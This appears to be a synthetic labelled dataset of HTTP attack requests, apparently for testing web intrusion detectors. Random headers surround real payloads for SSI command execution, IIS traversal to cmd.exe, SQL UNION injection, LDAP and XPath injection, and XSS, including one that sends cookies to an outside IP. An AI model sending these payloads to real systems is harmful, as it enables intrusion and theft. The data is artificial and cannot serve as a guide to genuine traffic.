Cookie: iwlMxrebad=67297664;9aimvp=9q_CAtew;JKux=93712;RKZQ=hotE2enqS8
Date: Sun, 10 Apr 05 08:05:21 UTC
ETag: W/"vIAsssT5MPBJtm8Z8RlU"
Expect: 100-continue
From: Wehzk@ajSrRs.cz
If-Modified-Since: Thu, 03 Aug 06 24:34:05 CET
If-Unmodified-Since: Sun, 09 Dec 07 13:12:33 GMT
If-Match: "4RwpNY5ja7vm3k-"
If-None-Match: *
If-Range: Sun, 31 Jul 05 13:20:23 GMT
Max-Forwards: 603
MIME-Version: 2.2
Pragma: no-cache
Referer: /shtat/leBse/7eeoiae/toso.css
TE: chunked,gzip;q=0.9
User-Agent: ebbIN (tjVxQcw-me; hLWOB9X)
UA-CPU: Sparc
Via: 9.9 www.Amne.tiff, 3.5 45.238.138.186:02693
Transfer-Encoding: compress
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 309 41.169.220.190 "skootttttuEirTl" 
X-Forwarded-For: 129.156.147.149
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43666
Start - Id: 40317
class: SSI
GET /aXWX@4J8.sock_streamG/Gnped6/odtiot0ekeae/tLk26ywPNMGEOQOVpbzQ/DpasswdPscHbN/zgWR/kK/a08OtRr6aqTgjh/n@group by2y.AlibD.asp?iilo0oDert=u+%27j&tw0snrn64sFx3u=btmocha&tfpr0digoIoie=%3C%21--++%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5Cnpvr%5Czf%5CRabRF.exe+++++d%3A%5Clhenyfej%5Cwww.chic.org%5Ctpptedea%5Cdatabase.mdb+%2Fx+++++exporttofoxpro%22--%3E&ona6ogidssq3=41402406&awetkapa=knkntdhmeadsort%29s&w1dstnb8ctRic=09&derroeyt=83rhws%3Eelahheol&y.JVM_M5.@Io=3eMperlrrn&saaze=ae77m&nttt3598krdwncL=+I%7Cuniond656%3Foconnectq%40upassthruoae&nFHVprocessing-instructionSgroup bytmp=i6P7_Qv5ve&p1mvTtHEL=guHgnstdinqor%29ycns HTTP/1.0
Host: www.iatoetnfxS.ch
Connection: close
Accept: text/xml;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: qez-yg, faUs-a, yeLoeieh-hE8arn, M-cN;q=0.8, eEcj-5;q=0.0
Cache-Control: sne=e7hae
Client-ip: 239.88.55.52
Cookie: atoaiaoe=Mpasswdranbiaulgaaccept me];9eewbpir=ein6z;3bodyBKHdZZE=8138;etnlo=6
Cookie2: $Version="373"
Date: Sat, 02 Jul 05 09:26:10 GMT
ETag: W/"BreSvbANyEzg2vf5"
Expect: uesime7x
From: rpic1ucn@6o6hir.ch
If-Modified-Since: Wed, 18 Jun 08 09:47:35 CET
If-Unmodified-Since: Mon, 16 Oct 06 19:28:22 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Dec 09 13:36:25 GMT
Max-Forwards: 7
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: intehp 4edI=sr6n1ysd
Authorization: tuinwa rtetnaLo=neheibee
Range: -2115,0045-233,-51
Referer: /oatm2et/etzcu/nwzokjh8.pdf
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/3.1 (X11; U; Open BSD i386 0.8; 5p-oh; rv:2.4.5) Gecko/18741436
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8587x911
Via: HTTP/5.5 156.205.173.200, 4.5 www.ntwtpo.jpeg, 5.1 205.130.212.131
Transfer-Encoding: tSeat
Upgrade: doiAa/8.2, ttps1j/4.1, hje/0.9, idg/3.2
Warning: 196 2.26.22.3:993 "ye78torehxsveoUeewSd" 
X-Forwarded-For: 232.141.193.11
X-Serial-Number: 475557970524
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40317
Start - Id: 49135
class: XPathInjection
GET /toWn8EqfPM/hrgols2dtrpoLiatt.shtml?6EhaNel=eA89ig4utnegNai1rh&R7ZW_OTY=hsu5aLnu&if=3256++++or+uQsch%2Fl2xi%2Fru%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D081%5D++++or++++985%3D&UzieyTpstf8o0iE=ttloo&hwhereu-R-Ka-E=s&ae1we9=R&eo4e=idWuY%40FO%402E&muiTroedu0=aowm HTTP/1.1
Host: www.feenwtnoli.be
Connection: close
Accept: text/html, video/mpeg
Accept-Charset: iso-8859-1, iso-8859-4
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 63.41.96.252
Cookie: gtppCiccedpc=1568642099;F0omZqh=bina>accepter\o
Cookie2: $Version="860"
Date: Sat, 05 Dec 09 24:23:14 GMT
ETag: "GgpzpScDa_69HXc"
Expect: 100-continue
From: NktwIe@earsOsuo.org
If-Modified-Since: Wed, 09 Jul 08 15:52:08 GMT
If-Unmodified-Since: Thu, 04 Mar 04 12:55:09 CET
If-Match: "8381p5QNphbGnxUvL"
If-None-Match: "2OeEYUsOl3sFDs_H"
If-Range: *
Max-Forwards: 87
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: E11su gdAiio=W96tf0
Authorization: NTLM c2VvZWVlbm9vdG5vcW1uaTBuOHR3c2hlaXByZWUyZW91NmxhZzFkbDdp
Range: 6-
Referer: /ensnzxa/n1ess.wav
TE: gzip;q=0.4,deflate
Trailer: Host
User-Agent: 04RkxQeIN http://www.hseeA.ch
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 793x723
Via: FTP/1.7 43.80.77.249
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49135
Start - Id: 44371
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.wDyisr.de
Connection: keep-alive
Accept: audio/basic, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: rw-o9rfso;q=0.8, zocde-ne;q=0.0, vttegelx-xp, sWue-tCe4utml, So0an-9a14;q=0.4
Cache-Control: min-fresh=1278
Client-ip: 5.40.112.96
Cookie: meilfiiue6grl=291561649;dSgroup byo3hLaccess_logYdl9=492260;BfRVO@.81R=cOdROL;e6hi8QtdupoNdh=en64tRN;tgmnssnaauDust=4;okobe=8saHacEeyhph~bn
Cookie2: $Version="768"
Date: Sun, 18 Feb 07 22:56:15 CET
ETag: W/"o4@mSRlI7dOqkgmEd"
Expect: p4ymocrd
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Sat, 16 Jul 05 22:25:00 CET
If-Unmodified-Since: Sat, 01 Dec 07 03:58:54 GMT
If-Match: "5gRCiYfPue.f_e2"
If-None-Match: *
If-Range: "usvv7nHn.nQv.BAuoaKB"
Max-Forwards: 3
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM b2xlcHdha2VhZGNvZGV5b2lvaWRzUTl0UDJtcG93cnU2bTA=
Authorization: Digest qop=auth
Range: -592489
Referer: /eYiTlm/rei7lbf/peer/euhegndo.png
TE: gzip;q=0.8
Trailer: Cache-Control
User-Agent: atXDor1V http://www.adda.net
UA-CPU: x86
UA-Disp: 0327,603,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 347x4806
Via: eabEdd/2.2 www.1seaz.gif, HTTP/9.7 143.197.225.111, 1.5 22.87.180.196:7855
Transfer-Encoding: compress
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44371
Start - Id: 45709
class: PathTransversal
GET /9rAqei/uf6cea9tsethoenn0us/dnUrnta3rheaoh6wie/fhsGntni/eG/eXrOs7qidgOEti4u/idh6rg/g5oM1R/shapoeniea/hee.php3?uifeaeoo=in+7nte+loesi%3Fz&i4o0Hhe=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Flaes%2Fnare%2Ftoatmain%2Fen.mspx&edede3aiwcn=o+ksm&Qsy7UtS.Mdp=054153&eSsersibOsieor=eottleselectigt%5D%28%25tt48i&oEnj=oc6%7CeUeneecf%3E%3BeaAfc%2B&.8W_grS_=sr-ag&NmetoosEEprnw=959&2is=revSLY0Qd_Sz HTTP/1.1
Host: www.uamLrjl.uk
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1250;q=0.6
Accept-Encoding: *
Accept-Language: ltsnc-rddh, ee-o39ah;q=0.4, kzpxuac-enenuwp;q=0.2
Cache-Control: only-if-cached
Client-ip: 40.163.244.11
Cookie: 9d=u6GUD705
Cookie2: $Version="894"
Date: Sat, 17 Mar 07 14:38:50 CET
ETag: "W2cyccIkLZi2-vmxGbfE"
Expect: 100-continue
From: eajtut@smge.gov
If-Modified-Since: Sun, 23 Apr 06 15:47:38 CET
If-Unmodified-Since: Sun, 29 Nov 09 08:51:36 GMT
If-Match: "eRyBH9-6dexol21oD"
If-None-Match: "uCmYFFYx004KMs_I-TE"
If-Range: Sat, 19 May 07 22:51:51 UTC
Max-Forwards: 4
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic b3VyZ2NvZTppaHNy
Range: 8441-
Referer: http://u9ewutR.gov/olnA/oae8r/seBi7.tiff
TE: trailers,chunked;q=0.3,trailers
Trailer: Cache-Control
User-Agent: eLtal (svYC2iBqrK)
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 967x7308
Via: HTTP/8.6 www.rr8w.css, 0.1 186.99.51.155
Transfer-Encoding: gzip
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 140.86.158.94
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45709
Start - Id: 42019
class: SqlInjection
GET /y9osyqjq/fl/emvFupnfW@G3z3/e6DA@W8_f1acsLyT@/aURGL/iyc/0Nmd/A7A/mDxhjLdn.gif?it=tmp%28dme7nwent&OBOHObItnxml.s=%27+%29++++UNION++ALL++SELECT+311%2C95%2C595%2C926%2C3++FROM++++ien6tT++WHERE+++++%28++%27%27++++%3D++%27&inesuwrtrmnrE47=srond&Eed2=dreplaceerim3W&uautoexeccSin5E.x8=Eltasley&npktoEa=e&nfpw9el9HnOce=a45_&kSPOlike67ps40dH=35132&9NX9rzYW_=4lnytxrl4ie HTTP/1.0
Host: 130.235.228.80
Connection: 2roshtc
Accept: */*
Accept-Charset: utf-8;q=0.6, windows-1258, windows-1252;q=0.4, shift_jis;q=0.3, us-ascii;q=0.7
Accept-Encoding: deflate, compress
Accept-Language: *
Cache-Control: max-age=81524
Client-ip: 144.52.64.113
Cookie: ldeeptxIH=va;-3YJmpr_=q;position9zTgCzW5=877
Cookie2: $Version="334"
Date: Mon, 06 Apr 09 07:43:55 CET
ETag: "RNqO_dyGb@AGbsbMlT4j"
Expect: 2ltBltn8=r1t9hTn5
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Fri, 24 Feb 06 05:09:41 GMT
If-Unmodified-Since: Thu, 15 Jan 09 10:48:56 CET
If-Match: "Grhx@b@7p0VR3nv"
If-None-Match: *
If-Range: "eNZE@sxZvflBCrhC"
Max-Forwards: 0
MIME-Version: 9.3
Pragma: ali7k=sesm16
Proxy-Authorization: iaijaB rjera=cnidom
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: /5kiDiQ/ludHny/oeLjsmlt.mpg
TE: deflate,chunked,chunked
Trailer: Date
User-Agent: Mozilla/2.4 (Windows; U; Win98 9.2; so-iq; rv:2.4.1) Gecko/87737473
UA-CPU: 68000
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0057x268
Via: FTP/4.0 156.120.63.185:1419, 1.5 197.9.109.159, HTTP/9.0 www.ihetpr.gif
Transfer-Encoding: ncge6; mb73t3n=nUkss
Upgrade: 1ra/6.0, 2yNai/3.3, a1ejc/1.5, osRwie/7.4, e6bte/5.7
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42019
Start - Id: 45697
class: PathTransversal
GET /lG.css?aozpdnca3e=cEntaeree5uwy&tel=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fnalentetch%2Fer%2Fmeiliemeit%2Fniveor.pl&zg=666998339&fieieir=51R51X5S&9ioedsEnsucAt=406994954 HTTP/1.0
Host: www.eehixw.fr:80
Connection: suei
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.7, gzip;q=0.2, gzip
Accept-Language: d-mh2;q=0.2, khcrln-Shte, eei-ntt1vD;q=0.9, ijcTh0r-wmpzniil
Cache-Control: max-age=91368
Client-ip: 23.236.107.29
Cookie: esuos=1t1hen6rmd;DTvSTM-=uaws;scasen1on=7269679;d8aVaaaoz=fynxEDoDxWG;s5e2H1eehs=5 hghttp)t|h
Cookie2: $Version="746"
Date: Thu, 20 Jan 05 02:23:02 GMT
ETag: "VHa4Nom4Fc_0gLMYw6WP"
Expect: 100-continue
From: ielefwrj@3csCfee.fr
If-Modified-Since: Wed, 01 Jun 05 04:33:33 GMT
If-Unmodified-Since: Tue, 15 Apr 08 09:07:45 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Feb 09 10:37:03 GMT
Max-Forwards: 5317
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: iauui tpnx43o=hneenas
Range: -934,-807,-703421
Referer: /zi4daluu/o5ds/cilleita/mi7hOo.txt
TE: chunked;q=0.9,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: 9sinonsciNhaamhcsw
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6938x271
Via: 4.6 237.41.149.212:70355, FTP/3.7 www.idny.jpg:4
Transfer-Encoding: elaapo; yeeeRfe=ethao
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 474 www.oRarFe.gif "irxQnatwEeiNheieol" "Sat, 16 Aug 08 18:32:38 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45697
Start - Id: 46777
class: XSS
POST /QNbv20bxmlfN%uZgwhere/eylnferEneoo/whereWtUHhhv.css? HTTP/1.0
Content-Length: 216
Content-Language: bjnutul,t
Content-Encoding: compress
Content-Location: /grreprit/o1htaE/nlRm0.jsp
Content-MD5: aWVhdWF0eXRhaGRuZW9zSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jun 05 04:04:22 UTC
Last-Modified: Thu, 08 Mar 07 09:04:57 GMT
Host: 112.41.184.212
Connection: keep-alive
Accept: video/quicktime, text/plain, text/plain;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: frh-td4il, n-girOWe, ndoossuN-c2r;q=0.9, nOKsue-ntantle
Cache-Control: no-store
Client-ip: 76.116.125.91
Cookie: 73inIri9=om6rve5|th:;elemaacah6Sxaa=e4eyOi>hxMBLbnd;emat=ze;dAcldlte9hr=g-@QeP;unrdhrOeh=Rerdo8u;vauenew=92104837
Cookie2: $Version="216"
Date: Thu, 24 Jan 08 06:21:05 UTC
ETag: W/"Ufr4QY4Us830CuN9T"
Expect: pnwtm=hnizs
From: dyenT@gpt6glsG.cz
If-Modified-Since: Thu, 14 Aug 08 14:47:28 CET
If-Unmodified-Since: Thu, 05 Apr 07 01:49:49 GMT
If-Match: "CPkEzOXatVZ9gEKcjO"
If-None-Match: "Vt60Asb7ZcDmgpveNk"
If-Range: Thu, 04 Feb 10 21:31:48 CET
Max-Forwards: 3
MIME-Version: 7.2
Pragma: tAZewos='lstla'
Proxy-Authorization: Digest opaque="9mhcA"
Authorization: Basic M01xc1NyaTp0ZHJz
Range: 462-
Referer: /vhsN/ysuum/iIycemC/tnLSm.asp
TE: deflate,trailers,deflate;q=0.2
Trailer: Trailer
User-Agent: Mozilla/0.5 (compatible; Konqueror/6.9; Open BSD i586; biceIeuetd)
UA-Color: color32
UA-Pixels: 1199x1516
Via: FTP/2.8 www.tmaturm3.htm
Transfer-Encoding: compress
Upgrade: ggs4o/0.2, ohoge/3.3, yemtX/6.0, tweoe/2.9, anym/6.6
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 670782401629
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ajbaVldva=u aan amhi&895mtdIEmirvas5=rtnts&ryebE=oatmail$; gltai[n&ri4gt5etgSo1dr=l_04W18A&elnbuI=<iframe     src    =   "   vbscript:[alert    ('enliox');]">&eneaetdearRomwe=lPm0pHFP3

End - Id: 46777
Start - Id: 36986
class: LdapInjection
GET /6ehCHB1mG1_/hgoLso/taWmcenedv5e9e7d/mjjyy85L.html?kBZcHceshutdowng=%29++%28++++%7C+%28enaJs%3Dlira*%29 HTTP/1.1
Host: 217.219.244.63
Connection: keep-alive
Accept: video/mpeg, application/postscript
Accept-Charset: x-mac-japanese;q=0.5, x-mac-roman, iso-2022-kr;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=6557
Client-ip: 155.94.191.185
Cookie: imscriptO21YtCH-=g
Cookie2: $Version="55"
Date: Tue, 28 Sep 04 24:34:33 UTC
ETag: W/"b3wJsWqNGTEe1_j"
Expect: 100-continue
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Tue, 05 Apr 05 12:42:11 GMT
If-Unmodified-Since: Mon, 08 Jan 07 01:33:24 GMT
If-Match: *
If-None-Match: "OrvU@KtcfM8_Ap4G"
If-Range: Sun, 29 Jan 06 11:54:07 UTC
Max-Forwards: 0366
MIME-Version: 5.8
Pragma: aoloet='ro4uy'
Proxy-Authorization: Basic Z2ROZGI6ZGdpaQ==
Authorization: Basic YVJlcnpkOnRkY2JoZA==
Range: 84-,-422477,1197-5319
Referer: /h7ayte/a0Cvms/1unf.mp3
TE: chunked
Trailer: Via
User-Agent: sreAB2p10 http://www.eFnmyda.biz
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: 3.2 www.onermn1l.png:2294
Transfer-Encoding: compress
Upgrade: m2cnia/0.2, h1ebb/7.9
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Forwarded-For: 159.94.130.144
X-Serial-Number: 0781389574649
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36986
Start - Id: 48292
class: XSS
PUT /ylCPZy@Dq/ydL/nbD.pl? HTTP/1.1
Content-Length: 36
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 08 Jul 05 17:01:41 UTC
Host: www.7fuja.net
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: euc-kr
Accept-Encoding: identity, compress;q=0.1, identity, deflate
Accept-Language: *;q=0.2
Cookie: mereiiopeiozBe=<img+src=javascript: alert ('hhfa.oehH') >
Date: Sat, 13 Aug 05 19:52:14 GMT
If-Modified-Since: Tue, 22 Jul 08 03:59:23 UTC
If-Range: *
Referer: /lriyTmTm/hnm5e/dOieavon.mp3
User-Agent: oN8azR.hMu http://www.tosrWrn.uk
----: -----------------------

lwi3can=tnNoBXYGnCi&xr0z=xpIb9E9hGen

End - Id: 48292
Start - Id: 37230
class: LdapInjection
GET /relgosrHnVrrr.dll?hta9ncie=bEhas8&ee9ano1Ein=oN3t.-D.&mboli=iS%29%28%26%28objectClass+++%3D++++ebne*%29&8atd0sytd0gmy=winseewwetetr%3BE&h6tt=3LwZ&br0gOaektermdh=msa329tweCpo&in3ln=tteslmhom4av&tln=%5Desn&fCm-zTXip3S=tayWnytofuntrnl&rrlf2h=99143058 HTTP/1.0
Host: www.teeiaz.de
Connection: close
Accept: text/html
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.9
Cache-Control: min-fresh=8
Client-ip: 164.10.58.80
Cookie: huo4rI=secmde0seeh2y
Cookie2: $Version="21"
Date: Mon, 26 Sep 05 19:21:11 CET
ETag: "V@YyE-8HoVuBPNB"
Expect: xg5edee=apam;5hda
From: 87ho@Inuowxs.net
If-Modified-Since: Tue, 31 May 05 19:43:14 CET
If-Unmodified-Since: Wed, 03 Nov 04 15:46:55 CET
If-Match: "jME4sAYPLwR-LZZ6"
If-None-Match: "SspthaH7ycw6c7JEyOT"
If-Range: Fri, 08 Jun 07 11:29:35 UTC
Max-Forwards: 58
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: vghc tzcn=txlrsuw
Range: -035
Referer: /iaoaf/mfrw/1pnwb/riuqpae.asmx
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.4 (Windows; U; Win98 3.3; cm-o8; rv:9.5.4) Gecko/76637692
UA-CPU: x86
UA-Disp: 5765,446,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: 3.2 107.133.119.75, 0.8 156.119.20.191
Transfer-Encoding: deflate
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 444 71.101.94.149:869 "e5eslcsyoIxfqbnaAe" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37230
Start - Id: 47908
class: XSS
GET /yirn/hhasafhdstothAe/dB5GOljh-pselecty/okkIMwblpZ2IG.js?r7odsaGkaTiet=%3Cimg++src+++%3D++%22+chanllit++++%22onmouseover+%3D%22+++%5Bwindow.open%28%27http%3A%2F%2F246.206.148.16%2Ficla.mspx%27%2Bdocument.cookie%29%3B%5D++++%22%3E HTTP/1.1
Host: www.en1rnalu.gov
Connection: keep-alive
Accept: video/mpeg;q=0.6, text/xml
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: pewO=s
Client-ip: 51.142.233.184
Cookie: Rktneo5azb=z;ecelrdeji0o6osC=t5ea7dU1p;oealOtscd9t5=oftuk64guaatyexeno;tT=allychildma
Cookie2: $Version="38"
Date: Sat, 01 Aug 09 07:06:41 GMT
ETag: "ifdVZPaP60cBTA8HNdjF"
Expect: nlrwmq
From: rigu@deao.net
If-Modified-Since: Sat, 21 Mar 09 13:22:19 UTC
If-Unmodified-Since: Sat, 13 Aug 05 06:40:41 GMT
If-Match: "T9_Qd8iIpYqOkC3m"
If-None-Match: "7eTlV5zANGR_DRZJR9-"
If-Range: Sun, 18 Apr 10 18:08:04 CET
Max-Forwards: 6
MIME-Version: 8.4
Pragma: rlyn=darlboj0
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Digest realm
Range: 0-,-42414
Referer: http://2Eoa.cz/ineee/dWss/eZnlnf/nDaty2As.js
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/7.8 (X11; U; Open BSD i586 4.4; ly-sn; rv:9.0.2) Gecko/54943097
UA-CPU: x86
UA-Disp: 1161,524,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 229x467
Via: 1.0 105.74.177.221, 5.5 www.inwm.shtml, FTP/7.0 www.eriooa.js
Transfer-Encoding: 4ahRe; nsfv=sEt8n
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 342 www.a3Idnne.js "aeea" "Tue, 23 Feb 10 05:56:33 UTC"
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47908
Start - Id: 36917
class: LdapInjection
POST /eu/netzyereplhuothhri/rjo7poejggvwmg/troiElkaoEnnjule9moM/51rpel/c75/raYRGdErYmSSGwPP/xgvFw/led3sed.js? HTTP/1.0
Content-Length: 242
Content-Language: qty0yop,ti
Content-Encoding: identity
Content-Location: http://gctea.gov/qhe8dh5/Ciso.php4
Content-MD5: b3NhdG91aWVwaXphdWVmZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Sep 05 18:44:20 GMT
Last-Modified: Sat, 10 Apr 04 07:30:18 GMT
Host: www.TneinOhy.uk:33951
Connection: upenld
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, gzip;q=0.1
Accept-Language: znaaoeEe-ro, Eew-iwisit
Cache-Control: no-cache
Client-ip: 23.24.154.22
Cookie: ujYbKx=kqho 
Cookie2: $Version="09"
Date: Sun, 12 Oct 08 15:56:01 UTC
ETag: W/"Kz7Dmc-HYJYpwWQd6ii"
Expect: 100-continue
From: dhafadn@folsiatle.com
If-Modified-Since: Fri, 18 Jan 08 07:32:28 GMT
If-Unmodified-Since: Sun, 22 Mar 09 13:07:45 GMT
If-Match: "SqEw28g1znnBLeF4MU"
If-None-Match: *
If-Range: Sat, 19 Sep 09 21:57:07 UTC
Max-Forwards: 928
MIME-Version: 8.8
Pragma: xpmpsct='soeAsaos'
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Digest algorithm=MD5-sess
Range: 03-
Referer: /8T7ss/eqensaf.tar.gz
TE: trailers,gzip;q=0.5
Trailer: If-Match
User-Agent: ucedespcse5bIco5Ky
UA-CPU: Sparc
UA-OS: Win98
UA-Pixels: 015x0585
Via: 0.9 www.4sseen6y.css:88198, FTP/9.2 www.tatane.css
Transfer-Encoding: gzip
Upgrade: jxf/7.0, xtlsth/8.7
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

L.k-L39Q8GD=gdwLN&ecel3twinb=ysEtr)(   |    (4m=*)&teio0edmE8i=aE(&eyrig=nop9itrSgsns&yzlmJsystem=815&zws=crgxp_o&ijelnditEiam4m=reeegsbitinlU&JtnetcatPa9jK@I=uOyJ__PzIIC&nfutwu6hThneir=4720&bnozuaiot7=351&xHxT01o1d=jicTcyuVmu_J

End - Id: 36917
Start - Id: 41709
class: SqlInjection
GET /iie0rttf/hGO2OLD5/hGXDr-2libpW/aettesKgrdnNs0/m0nnj0ee2/aKxS5FklxiIB.php4?73r_3=form%3CSvvfIlf+ksamen&cEuuseadefna=301131&fnultycofoukeh=%27%29+UNION++++ALL+SELECT+++9%2C6040%2C2%2C8%2C75++++FROM++++rTkrth++WHERE+++%28++++%27%27+++%3D+++%27&sWGhgwtca=m98isiEoiqod&e8hw2=t%3AcsliTrsbh&9tmls6E=aq&iservicesb2RHscriptH3e_=og HTTP/1.1
Host: www.dhrsjoAe.gov:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: macintosh, x-mac-arabic
Accept-Encoding: compress, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 17.192.139.19
Cookie: acnti=e4Y32uwP._;XwGWU.L=rRZ6XQ0;ahbt5utrger=13;tascanopecn=uIXo
Cookie2: $Version="0"
Date: Thu, 01 Dec 05 13:31:23 CET
ETag: "rMTCgN7KgemM@xWlsIt"
Expect: 100-continue
From: oo2sso@fOothntR.fr
If-Modified-Since: Fri, 25 Feb 05 12:24:40 GMT
If-Unmodified-Since: Fri, 22 Jul 05 20:23:29 GMT
If-Match: "GlBGxIFWRYIOYCD4w"
If-None-Match: *
If-Range: Fri, 27 May 05 17:51:41 CET
Max-Forwards: 36
MIME-Version: 9.0
Pragma: p8U='h'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic TEFhazM0ZTpwdGU1ZWM=
Range: 864538-4,42725-309719
Referer: http://www.tItu.org/3e8g/Ltat/AdDsnsoe.jsp
TE: chunked;q=0.7
Trailer: Via
User-Agent: Mozilla/9.3 (X11; U; SunOS sun4u 0.3; fh-Ei; rv:1.6.9) Gecko/48747128
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8765x189
Via: HTTP/0.2 www.orcbefoE.html, 6.9 81.211.65.19
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 196 174.84.69.81 "ewttXoTtla" 
X-Forwarded-For: 93.102.101.223
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41709
Start - Id: 36440
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 24.5.113.120:80
Connection: oxuohiua
